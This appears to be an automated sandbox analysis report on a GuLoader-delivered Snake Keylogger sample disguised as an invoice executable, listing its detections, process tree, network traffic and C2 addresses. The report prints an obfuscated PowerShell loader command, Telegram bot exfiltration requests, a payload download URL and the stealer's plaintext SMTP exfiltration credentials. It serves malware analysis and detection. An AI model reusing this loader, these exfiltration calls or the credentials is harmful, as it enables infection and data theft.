Edit tour

Windows Analysis Report
Invoice Pending Payment.exe

Overview

General Information

Sample name:	Invoice Pending Payment.exe
Analysis ID:	1622902
MD5:	e70e71a31781b44f850a39693784ce74
SHA1:	ce8cf2dc1b30d5d6870cc3d374c15e1005fdc879
SHA256:	a02b56b4c74424b72ae21d4737e822653e68b9762e1aeb313d81bd45abce39e7
Tags:	exenjratuser-lowmal3
Infos:

Detection

GuLoader, Snake Keylogger

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Early bird code injection technique detected

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected GuLoader

Yara detected Snake Keylogger

Yara detected Telegram RAT

AI detected suspicious PE digital signature

Found suspicious powershell code related to unpacking or dynamic code loading

Initial sample is a PE file and has a suspicious name

Joe Sandbox ML detected suspicious sample

Loading BitLocker PowerShell Module

Powershell drops PE file

Queues an APC in another process (thread injection)

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Writes to foreign memory regions

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to dynamically determine API calls

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Msiexec Initiated Connection

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

Invoice Pending Payment.exe (PID: 7332 cmdline: "C:\Users\user\Desktop\Invoice Pending Payment.exe" MD5: E70E71A31781B44F850A39693784CE74)

powershell.exe (PID: 8140 cmdline: "powershell.exe" -windowstyle minimized "$Bibrd=gc -Raw 'C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\Defmrkede\Crossbeam.Dec122';$Antiodont=$Bibrd.SubString(60335,3);.$Antiodont($Bibrd)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 8148 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

msiexec.exe (PID: 7524 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "federico@extintoresdemir.com", "Password": "s46S2&4+", "Host": "smtp.ionos.es", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000006.00000002.2965290125.00000000215A8000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000006.00000002.2965290125.00000000214A1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000001.00000002.2087345934.000000000A5BE000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: msiexec.exe PID: 7524	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: msiexec.exe PID: 7524	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security

Sigma Signatures

System Summary

Sigma detected: Msiexec Initiated Connection

Source: Network Connection

Author: frack113: Data: DestinationIp: 142.250.186.46, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 7524, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49737

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 8140, TargetFilename: C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\Defmrkede\Invoice Pending Payment.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle minimized "$Bibrd=gc -Raw 'C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\Defmrkede\Crossbeam.Dec122';$Antiodont=$Bibrd.SubString(60335,3);.$Antiodont($Bibrd)", CommandLine: "powershell.exe" -windowstyle minimized "$Bibrd=gc -Raw 'C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\Defmrkede\Crossbeam.Dec122';$Antiodont=$Bibrd.SubString(60335,3);.$Antiodont($Bibrd)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Invoice Pending Payment.exe", ParentImage: C:\Users\user\Desktop\Invoice Pending Payment.exe, ParentProcessId: 7332, ParentProcessName: Invoice Pending Payment.exe, ProcessCommandLine: "powershell.exe" -windowstyle minimized "$Bibrd=gc -Raw 'C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\Defmrkede\Crossbeam.Dec122';$Antiodont=$Bibrd.SubString(60335,3);.$Antiodont($Bibrd)", ProcessId: 8140, ProcessName: powershell.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-24T17:24:18.091399+0100	2803305	3	Unknown Traffic	192.168.2.4	49756	104.21.32.1	443	TCP
2025-02-24T17:24:20.791092+0100	2803305	3	Unknown Traffic	192.168.2.4	49777	104.21.32.1	443	TCP
2025-02-24T17:24:22.016880+0100	2803305	3	Unknown Traffic	192.168.2.4	49784	104.21.32.1	443	TCP
2025-02-24T17:24:25.936989+0100	2803305	3	Unknown Traffic	192.168.2.4	49815	104.21.32.1	443	TCP
2025-02-24T17:24:27.221526+0100	2803305	3	Unknown Traffic	192.168.2.4	49822	104.21.32.1	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-24T17:24:16.343542+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49741	158.101.44.242	80	TCP
2025-02-24T17:24:17.452898+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49741	158.101.44.242	80	TCP
2025-02-24T17:24:18.812277+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49759	158.101.44.242	80	TCP
2025-02-24T17:24:20.202977+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49771	158.101.44.242	80	TCP

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-24T17:24:11.156612+0100	2803270	2	Potentially Bad Traffic	192.168.2.4	49737	142.250.186.46	443	TCP

Joe Security ANOMALY Telegram Send Message

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-24T17:24:28.167476+0100	1810007	1	Potentially Bad Traffic	192.168.2.4	49828	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000006.00000002.2965290125.00000000214A1000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "federico@extintoresdemir.com", "Password": "s46S2&4+", "Host": "smtp.ionos.es", "Port": "587", "Version": "4.4"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\Defmrkede\Invoice Pending Payment.exe	ReversingLabs: Detection: 23%
Source: C:\Users\user\AppData\Roaming\Kalkvrksarbejderen84\chego\reverensens\Defmrkede\Invoice Pending Payment.exe	Virustotal: Detection: 28%			Perma Link

Multi AV Scanner detection for submitted file

Source: Invoice Pending Payment.exe	ReversingLabs: Detection: 23%
Source: Invoice Pending Payment.exe	Virustotal: Detection: 28%			Perma Link

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.8% probability

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: Invoice Pending Payment.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49751 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 142.250.186.46:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49828 version: TLS 1.2

Source: C:\Users\user\Desktop\Invoice Pending Payment.exe	Code function: 0_2_00405E6B FindFirstFileA,FindClose,	0_2_00405E6B
Source: C:\Users\user\Desktop\Invoice Pending Payment.exe	Code function: 0_2_00405427 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	0_2_00405427
Source: C:\Users\user\Desktop\Invoice Pending Payment.exe	Code function: 0_2_00402647 FindFirstFileA,	0_2_00402647

Source: C:\Users\user\Desktop\Invoice Pending Payment.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\Invoice Pending Payment.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache	Jump to behavior
Source: C:\Users\user\Desktop\Invoice Pending Payment.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\Invoice Pending Payment.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Users\user\Desktop\Invoice Pending Payment.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows	Jump to behavior
Source: C:\Users\user\Desktop\Invoice Pending Payment.exe	File opened: C:\Users\user\AppData\Local\Microsoft	Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 0253F45Dh	6_2_0253F2C0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 0253F45Dh	6_2_0253F4AC
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 0253FC19h	6_2_0253F974

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49828 -> 149.154.167.220:443

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:980108%0D%0ADate%20and%20Time:%2024/02/2025%20/%2022:29:47%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20980108%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 104.21.32.1 104.21.32.1
Source: Joe Sandbox View	IP Address: 104.21.32.1 104.21.32.1
Source: Joe Sandbox View	IP Address: 158.101.44.242 158.101.44.242

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49771 -> 158.101.44.242:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49759 -> 158.101.44.242:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49741 -> 158.101.44.242:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49756 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49822 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49737 -> 142.250.186.46:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49784 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49777 -> 104.21.32.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49815 -> 104.21.32.1:443

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1Nzmt_oJLJVDGk7AzLqTg32ZfePDF57a_ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1Nzmt_oJLJVDGk7AzLqTg32ZfePDF57a_&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 104.21.32.1:443 -> 192.168.2.4:49751 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1Nzmt_oJLJVDGk7AzLqTg32ZfePDF57a_ HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1Nzmt_oJLJVDGk7AzLqTg32ZfePDF57a_&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:980108%0D%0ADate%20and%20Time:%2024/02/2025%20/%2022:29:47%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20980108%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: drive.google.com
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Mon, 24 Feb 2025 16:24:28 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: msiexec.exe, 00000006.00000002.2965290125.00000000214A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: msiexec.exe, 00000006.00000002.2965290125.00000000214A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: msiexec.exe, 00000006.00000002.2965290125.00000000214A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: msiexec.exe, 00000006.00000002.2965290125.00000000214A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: Invoice Pending Payment.exe, Invoice Pending Payment.exe.1.dr	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: Invoice Pending Payment.exe, Invoice Pending Payment.exe.1.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000001.00000002.2078400803.0000000005C8B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000001.00000002.2073953654.0000000004D75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.2073953654.0000000004D75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000001.00000002.2073953654.0000000004C21000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2965290125.00000000214A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.2073953654.0000000004D75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: msiexec.exe, 00000006.00000002.2965290125.00000000214A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: powershell.exe, 00000001.00000002.2073953654.0000000004D75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: msiexec.exe, 00000006.00000002.2966930577.000000002276B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: powershell.exe, 00000001.00000002.2073953654.0000000004C21000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lBdq
Source: powershell.exe, 00000001.00000002.2073953654.0000000004D75000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: msiexec.exe, 00000006.00000002.2965290125.0000000021584000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: msiexec.exe, 00000006.00000002.2965290125.0000000021584000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: msiexec.exe, 00000006.00000002.2965290125.0000000021584000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: msiexec.exe, 00000006.00000002.2965290125.0000000021584000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:980108%0D%0ADate%20a
Source: msiexec.exe, 00000006.00000003.2224427665.000000000589D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: msiexec.exe, 00000006.00000002.2966930577.000000002276B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: msiexec.exe, 00000006.00000002.2966930577.000000002276B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: msiexec.exe, 00000006.00000002.2966930577.000000002276B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: msiexec.exe, 00000006.00000002.2965290125.0000000021660000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2965290125.0000000021651000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.2965290125.0000000021691000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: msiexec.exe, 00000006.00000002.2965290125.0000000021660000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en4
Source: msiexec.exe, 00000006.00000002.2965290125.0000000021651000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enX
